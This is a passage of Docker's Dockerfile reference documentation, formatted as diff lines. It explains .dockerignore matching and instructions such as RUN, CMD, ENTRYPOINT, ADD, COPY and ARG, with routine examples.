not part of the same command +that set `abc` to `bye`. + +## .dockerignore file + +Before the docker CLI sends the context to the docker daemon, it looks +for a file named `.dockerignore` in the root directory of the context. +If this file exists, the CLI modifies the context to exclude files and +directories that match patterns in it. This helps to avoid +unnecessarily sending large or sensitive files and directories to the +daemon and potentially adding them to images using `ADD` or `COPY`. + +The CLI interprets the `.dockerignore` file as a newline-separated +list of patterns similar to the file globs of Unix shells. For the +purposes of matching, the root of the context is considered to be both +the working and the root directory. For example, the patterns +`/foo/bar` and `foo/bar` both exclude a file or directory named `bar` +in the `foo` subdirectory of `PATH` or in the root of the git +repository located at `URL`. Neither excludes anything else. + +If a line in `.dockerignore` file starts with `#` in column 1, then this line is +considered as a comment and is ignored before interpreted by the CLI. + +Here is an example `.dockerignore` file: + +``` +# comment + */temp* + */*/temp* + temp? +``` + +This file causes the following build behavior: + +| Rule | Behavior | +|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `# comment` | Ignored. | +| `*/temp*` | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root. For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`. | +| `*/*/temp*` | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. | +| `temp?` | Exclude files and directories in the root directory whose names are a one-character extension of `temp`. For example, `/tempa` and `/tempb` are excluded. + + +Matching is done using Go's +[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. A +preprocessing step removes leading and trailing whitespace and +eliminates `.` and `..` elements using Go's +[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean). Lines +that are blank after preprocessing are ignored. + +Beyond Go's filepath.Match rules, Docker also supports a special +wildcard string `**` that matches any number of directories (including +zero). For example, `**/*.go` will exclude all files that end with `.go` +that are found in all directories, including the root of the build context. + +Lines starting with `!` (exclamation mark) can be used to make exceptions +to exclusions. The following is an example `.dockerignore` file that +uses this mechanism: + +``` + *.md + !README.md +``` + +All markdown files *except* `README.md` are excluded from the context. + +The placement of `!` exception rules influences the behavior: the last +line of the `.dockerignore` that matches a particular file determines +whether it is included or excluded. Consider the following example: + +``` + *.md + !README*.md + README-secret.md +``` + +No markdown files are included in the context except README files other than +`README-secret.md`. + +Now consider this example: + +``` + *.md + README-secret.md + !README*.md +``` + +All of the README files are included. The middle line has no effect because +`!README*.md` matches `README-secret.md` and comes last. + +You can even use the `.dockerignore` file to exclude the `Dockerfile` +and `.dockerignore` files. These files are still sent to the daemon +because it needs them to do its job. But the `ADD` and `COPY` commands +do not copy them to the image. + +Finally, you may want to specify which files to include in the +context, rather than which to exclude. To achieve this, specify `*` as +the first pattern, followed by one or more `!` exception patterns. + +**Note**: For historical reasons, the pattern `.` is ignored. + +## FROM + + FROM + +Or + + FROM : + +Or + + FROM @ + +The `FROM` instruction sets the [*Base Image*](glossary.md#base-image) +for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as +its first instruction. The image can be any valid image – it is especially easy +to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/). + +- `FROM` must be the first non-comment instruction in the `Dockerfile`. + +- `FROM` can appear multiple times within a single `Dockerfile` in order to create +multiple images. Simply make a note of the last image ID output by the commit +before each new `FROM` command. + +- The `tag` or `digest` values are optional. If you omit either of them, the builder +assumes a `latest` by default. The builder returns an error if it cannot match +the `tag` value. + +## RUN + +RUN has 2 forms: + +- `RUN ` (*shell* form, the command is run in a shell, which by +default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows) +- `RUN ["executable", "param1", "param2"]` (*exec* form) + +The `RUN` instruction will execute any commands in a new layer on top of the +current image and commit the results. The resulting committed image will be +used for the next step in the `Dockerfile`. + +Layering `RUN` instructions and generating commits conforms to the core +concepts of Docker where commits are cheap and containers can be created from +any point in an image's history, much like source control. + +The *exec* form makes it possible to avoid shell string munging, and to `RUN` +commands using a base image that does not contain the specified shell executable. + +The default shell for the *shell* form can be changed using the `SHELL` +command. + +In the *shell* form you can use a `\` (backslash) to continue a single +RUN instruction onto the next line. For example, consider these two lines: + +``` +RUN /bin/bash -c 'source $HOME/.bashrc; \ +echo $HOME' +``` +Together they are equivalent to this single line: + +``` +RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME' +``` + +> **Note**: +> To use a different shell, other than '/bin/sh', use the *exec* form +> passing in the desired shell. For example, +> `RUN ["/bin/bash", "-c", "echo hello"]` + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`. +> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. +> +> **Note**: +> In the *JSON* form, it is necessary to escape backslashes. This is +> particularly relevant on Windows where the backslash is the path separator. +> The following line would otherwise be treated as *shell* form due to not +> being valid JSON, and fail in an unexpected way: +> `RUN ["c:\windows\system32\tasklist.exe"]` +> The correct syntax for this example is: +> `RUN ["c:\\windows\\system32\\tasklist.exe"]` + +The cache for `RUN` instructions isn't invalidated automatically during +the next build. The cache for an instruction like +`RUN apt-get dist-upgrade -y` will be reused during the next build. The +cache for `RUN` instructions can be invalidated by using the `--no-cache` +flag, for example `docker build --no-cache`. + +See the [`Dockerfile` Best Practices +guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. + +The cache for `RUN` instructions can be invalidated by `ADD` instructions. See +[below](#add) for details. + +### Known issues (RUN) + +- [Issue 783](https://github.com/docker/docker/issues/783) is about file + permissions problems that can occur when using the AUFS file system. You + might notice it during an attempt to `rm` a file, for example. + + For systems that have recent aufs version (i.e., `dirperm1` mount option can + be set), docker will attempt to fix the issue automatically by mounting + the layers with `dirperm1` option. More details on `dirperm1` option can be + found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs) + + If your system doesn't have support for `dirperm1`, the issue describes a workaround. + +## CMD + +The `CMD` instruction has three forms: + +- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form) +- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*) +- `CMD command param1 param2` (*shell* form) + +There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD` +then only the last `CMD` will take effect. + +**The main purpose of a `CMD` is to provide defaults for an executing +container.** These defaults can include an executable, or they can omit +the executable, in which case you must specify an `ENTRYPOINT` +instruction as well. + +> **Note**: +> If `CMD` is used to provide default arguments for the `ENTRYPOINT` +> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified +> with the JSON array format. + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`. +> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. + +When used in the shell or exec formats, the `CMD` instruction sets the command +to be executed when running the image. + +If you use the *shell* form of the `CMD`, then the `` will execute in +`/bin/sh -c`: + + FROM ubuntu + CMD echo "This is a test." | wc - + +If you want to **run your** `` **without a shell** then you must +express the command as a JSON array and give the full path to the executable. +**This array form is the preferred format of `CMD`.** Any additional parameters +must be individually expressed as strings in the array: + + FROM ubuntu + CMD ["/usr/bin/wc","--help"] + +If you would like your container to run the same executable every time, then +you should consider using `ENTRYPOINT` in combination with `CMD`. See +[*ENTRYPOINT*](#entrypoint). + +If the user specifies arguments to `docker run` then they will override the +default specified in `CMD`. + +> **Note**: +> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits +> the result; `CMD` does not execute anything at build time, but specifies +> the intended command for the image. + +## LABEL + + LABEL = = = ... + +The `LABEL` instruction adds metadata to an image. A `LABEL` is a +key-value pair. To include spaces within a `LABEL` value, use quotes and +backslashes as you would in command-line parsing. A few usage examples: + + LABEL "com.example.vendor"="ACME Incorporated" + LABEL com.example.label-with-value="foo" + LABEL version="1.0" + LABEL description="This text illustrates \ + that label-values can span multiple lines." + +An image can have more than one label. To specify multiple labels, +Docker recommends combining labels into a single `LABEL` instruction where +possible. Each `LABEL` instruction produces a new layer which can result in an +inefficient image if you use many labels. This example results in a single image +layer. + + LABEL multi.label1="value1" multi.label2="value2" other="value3" + +The above can also be written as: + + LABEL multi.label1="value1" \ + multi.label2="value2" \ + other="value3" + +Labels are additive including `LABEL`s in `FROM` images. If Docker +encounters a label/key that already exists, the new value overrides any previous +labels with identical keys. + +To view an image's labels, use the `docker inspect` command. + + "Labels": { + "com.example.vendor": "ACME Incorporated" + "com.example.label-with-value": "foo", + "version": "1.0", + "description": "This text illustrates that label-values can span multiple lines.", + "multi.label1": "value1", + "multi.label2": "value2", + "other": "value3" + }, + +## MAINTAINER (deprecated) + + MAINTAINER + +The `MAINTAINER` instruction sets the *Author* field of the generated images. +The `LABEL` instruction is a much more flexible version of this and you should use +it instead, as it enables setting any metadata you require, and can be viewed +easily, for example with `docker inspect`. To set a label corresponding to the +`MAINTAINER` field you could use: + + LABEL maintainer "SvenDowideit@home.org.au" + +This will then be visible from `docker inspect` with the other labels. + +## EXPOSE + + EXPOSE [...] + +The `EXPOSE` instruction informs Docker that the container listens on the +specified network ports at runtime. `EXPOSE` does not make the ports of the +container accessible to the host. To do that, you must use either the `-p` flag +to publish a range of ports or the `-P` flag to publish all of the exposed +ports. You can expose one port number and publish it externally under another +number. + +To set up port redirection on the host system, see [using the -P +flag](run.md#expose-incoming-ports). The Docker network feature supports +creating networks without the need to expose ports within the network, for +detailed information see the [overview of this +feature](https://docs.docker.com/engine/userguide/networking/)). + +## ENV + + ENV + ENV = ... + +The `ENV` instruction sets the environment variable `` to the value +``. This value will be in the environment of all "descendant" +`Dockerfile` commands and can be [replaced inline](#environment-replacement) in +many as well. + +The `ENV` instruction has two forms. The first form, `ENV `, +will set a single variable to a value. The entire string after the first +space will be treated as the `` - including characters such as +spaces and quotes. + +The second form, `ENV = ...`, allows for multiple variables to +be set at one time. Notice that the second form uses the equals sign (=) +in the syntax, while the first form does not. Like command line parsing, +quotes and backslashes can be used to include spaces within values. + +For example: + + ENV myName="John Doe" myDog=Rex\ The\ Dog \ + myCat=fluffy + +and + + ENV myName John Doe + ENV myDog Rex The Dog + ENV myCat fluffy + +will yield the same net results in the final image, but the first form +is preferred because it produces a single cache layer. + +The environment variables set using `ENV` will persist when a container is run +from the resulting image. You can view the values using `docker inspect`, and +change them using `docker run --env =`. + +> **Note**: +> Environment persistence can cause unexpected side effects. For example, +> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get +> users on a Debian-based image. To set a value for a single command, use +> `RUN = `. + +## ADD + +ADD has two forms: + +- `ADD ... ` +- `ADD ["",... ""]` (this form is required for paths containing +whitespace) + +The `ADD` instruction copies new files, directories or remote file URLs from `` +and adds them to the filesystem of the image at the path ``. + +Multiple `` resource may be specified but if they are files or +directories then they must be relative to the source directory that is +being built (the context of the build). + +Each `` may contain wildcards and matching will be done using Go's +[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: + + ADD hom* /mydir/ # adds all files starting with "hom" + ADD hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" + +The `` is an absolute path, or a path relative to `WORKDIR`, into which +the source will be copied inside the destination container. + + ADD test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ + ADD test /absoluteDir/ # adds "test" to /absoluteDir/ + +All new files and directories are created with a UID and GID of 0. + +In the case where `` is a remote file URL, the destination will +have permissions of 600. If the remote file being retrieved has an HTTP +`Last-Modified` header, the timestamp from that header will be used +to set the `mtime` on the destination file. However, like any other file +processed during an `ADD`, `mtime` will not be included in the determination +of whether or not the file has changed and the cache should be updated. + +> **Note**: +> If you build by passing a `Dockerfile` through STDIN (`docker +> build - < somefile`), there is no build context, so the `Dockerfile` +> can only contain a URL based `ADD` instruction. You can also pass a +> compressed archive through STDIN: (`docker build - < archive.tar.gz`), +> the `Dockerfile` at the root of the archive and the rest of the +> archive will be used as the context of the build. + +> **Note**: +> If your URL files are protected using authentication, you +> will need to use `RUN wget`, `RUN curl` or use another tool from +> within the container as the `ADD` instruction does not support +> authentication. + +> **Note**: +> The first encountered `ADD` instruction will invalidate the cache for all +> following instructions from the Dockerfile if the contents of `` have +> changed. This includes invalidating the cache for `RUN` instructions. +> See the [`Dockerfile` Best Practices +guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. + + +`ADD` obeys the following rules: + +- The `` path must be inside the *context* of the build; + you cannot `ADD ../something /something`, because the first step of a + `docker build` is to send the context directory (and subdirectories) to the + docker daemon. + +- If `` is a URL and `` does not end with a trailing slash, then a + file is downloaded from the URL and copied to ``. + +- If `` is a URL and `` does end with a trailing slash, then the + filename is inferred from the URL and the file is downloaded to + `/`. For instance, `ADD http://example.com/foobar /` would + create the file `/foobar`. The URL must have a nontrivial path so that an + appropriate filename can be discovered in this case (`http://example.com` + will not work). + +- If `` is a directory, the entire contents of the directory are copied, + including filesystem metadata. + +> **Note**: +> The directory itself is not copied, just its contents. + +- If `` is a *local* tar archive in a recognized compression format + (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources + from *remote* URLs are **not** decompressed. When a directory is copied or + unpacked, it has the same behavior as `tar -x`, the result is the union of: + + 1. Whatever existed at the destination path and + 2. The contents of the source tree, with conflicts resolved in favor + of "2." on a file-by-file basis. + + > **Note**: + > Whether a file is identified as a recognized compression format or not + > is done solely based on the contents of the file, not the name of the file. + > For example, if an empty file happens to end with `.tar.gz` this will not + > be recognized as a compressed file and **will not** generate any kind of + > decompression error message, rather the file will simply be copied to the + > destination. + +- If `` is any other kind of file, it is copied individually along with + its metadata. In this case, if `` ends with a trailing slash `/`, it + will be considered a directory and the contents of `` will be written + at `/base()`. + +- If multiple `` resources are specified, either directly or due to the + use of a wildcard, then `` must be a directory, and it must end with + a slash `/`. + +- If `` does not end with a trailing slash, it will be considered a + regular file and the contents of `` will be written at ``. + +- If `` doesn't exist, it is created along with all missing directories + in its path. + +## COPY + +COPY has two forms: + +- `COPY ... ` +- `COPY ["",... ""]` (this form is required for paths containing +whitespace) + +The `COPY` instruction copies new files or directories from `` +and adds them to the filesystem of the container at the path ``. + +Multiple `` resource may be specified but they must be relative +to the source directory that is being built (the context of the build). + +Each `` may contain wildcards and matching will be done using Go's +[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: + + COPY hom* /mydir/ # adds all files starting with "hom" + COPY hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" + +The `` is an absolute path, or a path relative to `WORKDIR`, into which +the source will be copied inside the destination container. + + COPY test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ + COPY test /absoluteDir/ # adds "test" to /absoluteDir/ + +All new files and directories are created with a UID and GID of 0. + +> **Note**: +> If you build using STDIN (`docker build - < somefile`), there is no +> build context, so `COPY` can't be used. + +`COPY` obeys the following rules: + +- The `` path must be inside the *context* of the build; + you cannot `COPY ../something /something`, because the first step of a + `docker build` is to send the context directory (and subdirectories) to the + docker daemon. + +- If `` is a directory, the entire contents of the directory are copied, + including filesystem metadata. + +> **Note**: +> The directory itself is not copied, just its contents. + +- If `` is any other kind of file, it is copied individually along with + its metadata. In this case, if `` ends with a trailing slash `/`, it + will be considered a directory and the contents of `` will be written + at `/base()`. + +- If multiple `` resources are specified, either directly or due to the + use of a wildcard, then `` must be a directory, and it must end with + a slash `/`. + +- If `` does not end with a trailing slash, it will be considered a + regular file and the contents of `` will be written at ``. + +- If `` doesn't exist, it is created along with all missing directories + in its path. + +## ENTRYPOINT + +ENTRYPOINT has two forms: + +- `ENTRYPOINT ["executable", "param1", "param2"]` + (*exec* form, preferred) +- `ENTRYPOINT command param1 param2` + (*shell* form) + +An `ENTRYPOINT` allows you to configure a container that will run as an executable. + +For example, the following will start nginx with its default content, listening +on port 80: + + docker run -i -t --rm -p 80:80 nginx + +Command line arguments to `docker run ` will be appended after all +elements in an *exec* form `ENTRYPOINT`, and will override all elements specified +using `CMD`. +This allows arguments to be passed to the entry point, i.e., `docker run -d` +will pass the `-d` argument to the entry point. +You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint` +flag. + +The *shell* form prevents any `CMD` or `run` command line arguments from being +used, but has the disadvantage that your `ENTRYPOINT` will be started as a +subcommand of `/bin/sh -c`, which does not pass signals. +This means that the executable will not be the container's `PID 1` - and +will _not_ receive Unix signals - so your executable will not receive a +`SIGTERM` from `docker stop `. + +Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect. + +### Exec form ENTRYPOINT example + +You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands +and arguments and then use either form of `CMD` to set additional defaults that +are more likely to be changed. + + FROM ubuntu + ENTRYPOINT ["top", "-b"] + CMD ["-c"] + +When you run the container, you can see that `top` is the only process: + + $ docker run -it --rm --name test top -H + top - 08:25:00 up 7:27, 0 users, load average: 0.00, 0.01, 0.05 + Threads: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + %Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st + KiB Mem: 2056668 total, 1616832 used, 439836 free, 99352 buffers + KiB Swap: 1441840 total, 0 used, 1441840 free. 1324440 cached Mem + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 19744 2336 2080 R 0.0 0.1 0:00.04 top + +To examine the result further, you can use `docker exec`: + + $ docker exec -it test ps aux + USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND + root 1 2.6 0.1 19752 2352 ? Ss+ 08:24 0:00 top -b -H + root 7 0.0 0.1 15572 2164 ? R+ 08:25 0:00 ps aux + +And you can gracefully request `top` to shut down using `docker stop test`. + +The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the +foreground (i.e., as `PID 1`): + +``` +FROM debian:stable +RUN apt-get update && apt-get install -y --force-yes apache2 +EXPOSE 80 443 +VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"] +ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] +``` + +If you need to write a starter script for a single executable, you can ensure that +the final executable receives the Unix signals by using `exec` and `gosu` +commands: + +```bash +#!/bin/bash +set -e + +if [ "$1" = 'postgres' ]; then + chown -R postgres "$PGDATA" + + if [ -z "$(ls -A "$PGDATA")" ]; then + gosu postgres initdb + fi + + exec gosu postgres "$@" +fi + +exec "$@" +``` + +Lastly, if you need to do some extra cleanup (or communicate with other containers) +on shutdown, or are co-ordinating more than one executable, you may need to ensure +that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then +does some more work: + +``` +#!/bin/sh +# Note: I've written this using sh so it works in the busybox container too + +# USE the trap if you need to also do manual cleanup after the service is stopped, +# or need to start multiple services in the one container +trap "echo TRAPed signal" HUP INT QUIT TERM + +# start service in background here +/usr/sbin/apachectl start + +echo "[hit enter key to exit] or run 'docker stop '" +read + +# stop service and clean up here +echo "stopping apache" +/usr/sbin/apachectl stop + +echo "exited $0" +``` + +If you run this image with `docker run -it --rm -p 80:80 --name test apache`, +you can then examine the container's processes with `docker exec`, or `docker top`, +and then ask the script to stop Apache: + +```bash +$ docker exec -it test ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.1 0.0 4448 692 ? Ss+ 00:42 0:00 /bin/sh /run.sh 123 cmd cmd2 +root 19 0.0 0.2 71304 4440 ? Ss 00:42 0:00 /usr/sbin/apache2 -k start +www-data 20 0.2 0.2 360468 6004 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start +www-data 21 0.2 0.2 360468 6000 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start +root 81 0.0 0.1 15572 2140 ? R+ 00:44 0:00 ps aux +$ docker top test +PID USER COMMAND +10035 root {run.sh} /bin/sh /run.sh 123 cmd cmd2 +10054 root /usr/sbin/apache2 -k start +10055 33 /usr/sbin/apache2 -k start +10056 33 /usr/sbin/apache2 -k start +$ /usr/bin/time docker stop test +test +real 0m 0.27s +user 0m 0.03s +sys 0m 0.03s +``` + +> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`, +> but this can only set the binary to *exec* (no `sh -c` will be used). + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`. +> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. + +### Shell form ENTRYPOINT example + +You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`. +This form will use shell processing to substitute shell environment variables, +and will ignore any `CMD` or `docker run` command line arguments. +To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable +correctly, you need to remember to start it with `exec`: + + FROM ubuntu + ENTRYPOINT exec top -b + +When you run this image, you'll see the single `PID 1` process: + + $ docker run -it --rm --name test top + Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached + CPU: 5% usr 0% sys 0% nic 94% idle 0% io 0% irq 0% sirq + Load average: 0.08 0.03 0.05 2/98 6 + PID PPID USER STAT VSZ %VSZ %CPU COMMAND + 1 0 root R 3164 0% 0% top -b + +Which will exit cleanly on `docker stop`: + + $ /usr/bin/time docker stop test + test + real 0m 0.20s + user 0m 0.02s + sys 0m 0.04s + +If you forget to add `exec` to the beginning of your `ENTRYPOINT`: + + FROM ubuntu + ENTRYPOINT top -b + CMD --ignored-param1 + +You can then run it (giving it a name for the next step): + + $ docker run -it --name test top --ignored-param2 + Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached + CPU: 9% usr 2% sys 0% nic 88% idle 0% io 0% irq 0% sirq + Load average: 0.01 0.02 0.05 2/101 7 + PID PPID USER STAT VSZ %VSZ %CPU COMMAND + 1 0 root S 3168 0% 0% /bin/sh -c top -b cmd cmd2 + 7 1 root R 3164 0% 0% top -b + +You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`. + +If you then run `docker stop test`, the container will not exit cleanly - the +`stop` command will be forced to send a `SIGKILL` after the timeout: + + $ docker exec -it test ps aux + PID USER COMMAND + 1 root /bin/sh -c top -b cmd cmd2 + 7 root top -b + 8 root ps aux + $ /usr/bin/time docker stop test + test + real 0m 10.19s + user 0m 0.04s + sys 0m 0.03s + +### Understand how CMD and ENTRYPOINT interact + +Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container. +There are few rules that describe their co-operation. + +1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands. + +2. `ENTRYPOINT` should be defined when using the container as an executable. + +3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command +or for executing an ad-hoc command in a container. + +4. `CMD` will be overridden when running the container with alternative arguments. + +The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations: + +| | No ENTRYPOINT | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"] | +|--------------------------------|----------------------------|--------------------------------|------------------------------------------------| +| **No CMD** | *error, not allowed* | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry | +| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd | +| **CMD ["p1_cmd", "p2_cmd"]** | p1_cmd p2_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd | +| **CMD exec_cmd p1_cmd** | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd | + +## VOLUME + + VOLUME ["/data"] + +The `VOLUME` instruction creates a mount point with the specified name +and marks it as holding externally mounted volumes from native host or other +containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain +string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log +/var/db`. For more information/examples and mounting instructions via the +Docker client, refer to +[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume) +documentation. + +The `docker run` command initializes the newly created volume with any data +that exists at the specified location within the base image. For example, +consider the following Dockerfile snippet: + + FROM ubuntu + RUN mkdir /myvol + RUN echo "hello world" > /myvol/greeting + VOLUME /myvol + +This Dockerfile results in an image that causes `docker run`, to +create a new mount point at `/myvol` and copy the `greeting` file +into the newly created volume. + +> **Note**: +> If any build steps change the data within the volume after it has been +> declared, those changes will be discarded. + +> **Note**: +> The list is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +## USER + + USER daemon + +The `USER` instruction sets the user name or UID to use when running the image +and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the +`Dockerfile`. + +## WORKDIR + + WORKDIR /path/to/workdir + +The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`, +`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`. +If the `WORKDIR` doesn't exist, it will be created even if it's not used in any +subsequent `Dockerfile` instruction. + +It can be used multiple times in the one `Dockerfile`. If a relative path +is provided, it will be relative to the path of the previous `WORKDIR` +instruction. For example: + + WORKDIR /a + WORKDIR b + WORKDIR c + RUN pwd + +The output of the final `pwd` command in this `Dockerfile` would be +`/a/b/c`. + +The `WORKDIR` instruction can resolve environment variables previously set using +`ENV`. You can only use environment variables explicitly set in the `Dockerfile`. +For example: + + ENV DIRPATH /path + WORKDIR $DIRPATH/$DIRNAME + RUN pwd + +The output of the final `pwd` command in this `Dockerfile` would be +`/path/$DIRNAME` + +## ARG + + ARG [=] + +The `ARG` instruction defines a variable that users can pass at build-time to +the builder with the `docker build` command using the `--build-arg =` +flag. If a user specifies a build argument that was not +defined in the Dockerfile, the build outputs a warning. + +``` +[Warning] One or more build-args [foo] were not consumed. +``` + +The Dockerfile author can define a single variable by specifying `ARG` once or many +variables by specifying `ARG` more than once. For example, a valid Dockerfile: + +``` +FROM busybox +ARG user1 +ARG buildno +... +``` + +A Dockerfile author may optionally specify a default value for an `ARG` instruction: + +``` +FROM busybox +ARG user1=someuser +ARG buildno=1 +... +``` + +If an `ARG` value has a default and if there is no value passed at build-time, the +builder uses the default. + +An `ARG` variable definition comes into effect from the line on which it is +defined in the `Dockerfile` not from the argument's use on the command-line or +elsewhere. For example, consider this Dockerfile: + +``` +1 FROM busybox +2 USER ${user:-some_user} +3 ARG user +4 USER $user +... +``` +A user builds this file by calling: + +``` +$ docker build --build-arg user=what_user Dockerfile +``` + +The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the +subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is +defined and the `what_user` value was passed on the command line. Prior to its definition by an +`ARG` instruction, any use of a variable results in an empty string. + +> **Warning:** It is not recommended to use build-time variables for +> passing secrets like github keys, user credentials etc. Build-time variable +> values are visible to any user of the image with the `docker history` command. + +You can use an `ARG` or an `ENV` instruction to specify variables that are +available to the `RUN` instruction. Environment variables defined using the +`ENV` instruction always override an `ARG` instruction of the same name. Consider +this Dockerfile with an `ENV` and `ARG` instruction. + +``` +1 FROM ubuntu +2 ARG CONT_IMG_VER +3 ENV CONT_IMG_VER v1.0.0 +4 RUN echo $CONT_IMG_VER +``` +Then, assume this image is built with this command: + +``` +$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile +``` + +In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting +passed by the user:`v2.0.1` This behavior is similar to a shell +script where a locally scoped variable overrides the variables passed as +arguments or inherited from environment, from its point of definition. + +Using the example above but a different `ENV` specification you can create more +useful interactions between `ARG` and `ENV` instructions: + +``` +1 FROM ubuntu +2 ARG CONT_IMG_VER +3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} +4 RUN echo $CONT_IMG_VER +``` + +Unlike an `ARG` instruction, `ENV` values are always persisted in the built +image. Consider a docker build without the `--build-arg` flag: + +``` +$ docker build Dockerfile +``` + +Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but +its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. + +The variable expansion technique in this example allows you to pass arguments +from the command line and persist them in the final image by leveraging the +`ENV` instruction. Variable expansion is only supported for [a limited set of +Dockerfile instructions.](#environment-replacement) + +Docker has a set of predefined `ARG` variables that you can use without a +corresponding `ARG` instruction in the Dockerfile. + +* `HTTP_PROXY` +* `http_proxy` +* `HTTPS_PROXY` +* `https_proxy` +* `FTP_PROXY` +* `ftp_proxy` +* `NO_PROXY` +* `no_proxy` + +To use these, simply pass them on the command line using the flag: + +``` +--build-arg = +``` + +### Impact on build caching + +`ARG` variables are not persisted into the built image as `ENV` variables are. +However, `ARG` variables do impact the build cache in similar ways. If a +Dockerfile defines an `ARG` variable whose value is different from a previous +build, then a "cache miss" occurs upon its first usage, not its definition. In +particular, all `RUN` instructions following an `ARG` instruction use the `ARG` +variable implicitly (as an environment variable), thus can cause a cache miss. + +For example, consider these two Dockerfile: + +``` +1 FROM 